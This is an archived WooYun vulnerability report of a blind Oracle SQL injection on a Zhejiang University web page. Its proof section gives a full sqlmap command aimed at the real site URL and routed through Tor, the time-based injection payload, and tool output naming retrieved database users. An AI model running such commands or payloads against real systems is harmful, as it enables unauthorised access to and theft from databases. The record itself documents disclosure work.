当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106052

漏洞标题:浙江大学某分站Oracle数据库盲注

相关厂商:浙江大学

漏洞作者: 路人甲

提交时间:2015-04-08 15:04

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-08: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

浙江大学某分站Oracle数据库盲注

详细说明:

没什么好说的,求rank

漏洞证明:

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=15 -u "http://digitalmuseum.zju.edu.cn/front.do?methede=yuanxiaogood&schoolid=43&jishuid=1002&ytype=2&schoolid=43&ytype=2" -p jishuid --users


---
Parameter: jishuid (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: methede=yuanxiaogood&schoolid=43&jishuid=1002') AND 6465=DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(66)||CHR(103)||CHR(102),15) AND ('ZqZb'='ZqZb&ytype=2&schoolid=43&ytype=2
---
[09:23:28] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[09:23:28] [INFO] fetching database users
[09:23:28] [INFO] fetching number of database users
[09:28:08] [INFO] retrieved:
LIUFEIAUTH
[10:15:37] [INFO] retrieved: SH
[10:19:58] [INFO] retrieved: IX
[10:24:11] [INFO] retrieved: OE
[10:27:59] [INFO] retrieved: HR
[10:32:20] [INFO] retrieved: ^C
[10:33:17] [ERROR] user aborted

修复方案:

WAF吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-13 16:58

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无